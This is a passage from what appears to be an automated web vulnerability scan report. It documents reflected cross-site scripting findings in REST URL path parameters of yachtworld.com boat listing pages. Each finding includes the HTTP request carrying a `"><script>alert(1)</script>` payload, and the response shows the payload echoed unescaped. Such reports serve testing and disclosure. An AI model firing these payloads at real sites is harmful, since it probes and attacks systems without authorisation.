2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 19:39:48 GMT
Set-Cookie: VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 27640

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<t
...[SNIP]...
<a rel="nofollow" href="/core/listing/photoGallery.jsp?slim=quick&currency=USD&units=Feet&seo=0&checked_boats=2262662&66f98"><script>alert(1)</script>b2126836e29=1&boat_id=2262662&back=/core/boats/2006/Regulator-32-Forward-Seating-2262662/Somers-Point/NJ/United-States&boat_id=2262662">
...[SNIP]...

3.146. http://www.yachtworld.com/boats/2006/Regulator-32fs-With-Trailer-2267348/Quincy/MA/United-States [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/2006/Regulator-32fs-With-Trailer-2267348/Quincy/MA/United-States

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 701d1"><script>alert(1)</script>acf6dc5541f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2006/Regulator-32fs-With-Trailer-2267348/Quincy701d1"><script>alert(1)</script>acf6dc5541f/MA/United-States HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:03:51 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Fri, 14 Jan 2011 16:46:52 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2267348%5B%25%5D32%27+Regulator+32FS+with+Trailer%5B%25%5DUSD%26nbsp%3B139%2C900%5B%25%5DQuincy%2C+MA%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F7%2F3%2F2267348_1_mini.jpg%3F1285440379000%5B%25%5D%2Fboats%2F2006%2FRegulator-32FS-with-Trailer-2267348%2FQuincy%2FMA%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 20:03:51 GMT
Set-Cookie: VIEWED_BOATS_STORE=2267348%5B%25%5D32%27+Regulator+32FS+with+Trailer%5B%25%5DUSD%26nbsp%3B139%2C900%5B%25%5DQuincy%2C+MA%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F7%2F3%2F2267348_1_mini.jpg%3F1285440379000%5B%25%5D%2Fboats%2F2006%2FRegulator-32FS-with-Trailer-2267348%2FQuincy%2FMA%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<t
...[SNIP]...
<a rel="nofollow" href="/core/listing/photoGallery.jsp?slim=quick&currency=USD&units=Feet&seo=0&checked_boats=2267348&boat_id=2267348&back=/core/boats/2006/Regulator-32fs-With-Trailer-2267348/Quincy701d1"><script>alert(1)</script>acf6dc5541f/MA/United-States&boat_id=2267348">
...[SNIP]...

3.147. http://www.yachtworld.com/boats/2006/Regulator-32fs-With-Trailer-2267348/Quincy/MA/United-States [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/2006/Regulator-32fs-With-Trailer-2267348/Quincy/MA/United-States

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b901f"><script>alert(1)</script>154356f8cd2 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2006/Regulator-32fs-With-Trailer-2267348/Quincy/MAb901f"><script>alert(1)</script>154356f8cd2/United-States HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:04:19 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Fri, 14 Jan 2011 16:46:52 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2267348%5B%25%5D32%27+Regulator+32FS+with+Trailer%5B%25%5DUSD%26nbsp%3B139%2C900%5B%25%5DQuincy%2C+MA%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F7%2F3%2F2267348_1_mini.jpg%3F1285440379000%5B%25%5D%2Fboats%2F2006%2FRegulator-32FS-with-Trailer-2267348%2FQuincy%2FMA%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 20:04:19 GMT
Set-Cookie: VIEWED_BOATS_STORE=2267348%5B%25%5D32%27+Regulator+32FS+with+Trailer%5B%25%5DUSD%26nbsp%3B139%2C900%5B%25%5DQuincy%2C+MA%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F7%2F3%2F2267348_1_mini.jpg%3F1285440379000%5B%25%5D%2Fboats%2F2006%2FRegulator-32FS-with-Trailer-2267348%2FQuincy%2FMA%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<t
...[SNIP]...
<a rel="nofollow" href="/core/listing/photoGallery.jsp?slim=quick&currency=USD&units=Feet&seo=0&checked_boats=2267348&boat_id=2267348&back=/core/boats/2006/Regulator-32fs-With-Trailer-2267348/Quincy/MAb901f"><script>alert(1)</script>154356f8cd2/United-States&boat_id=2267348">
...[SNIP]...

3.148. http://www.yachtworld.com/boats/2006/Regulator-32fs-With-Trailer-2267348/Quincy/MA/United-States [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/2006/Regulator-32fs-With-Trailer-2267348/Quincy/MA/United-States

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70e00"><script>alert(1)</script>0de7dd69d71 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2006/Regulator-32fs-With-Trailer-2267348/Quincy/MA/United-States70e00"><script>alert(1)</script>0de7dd69d71 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
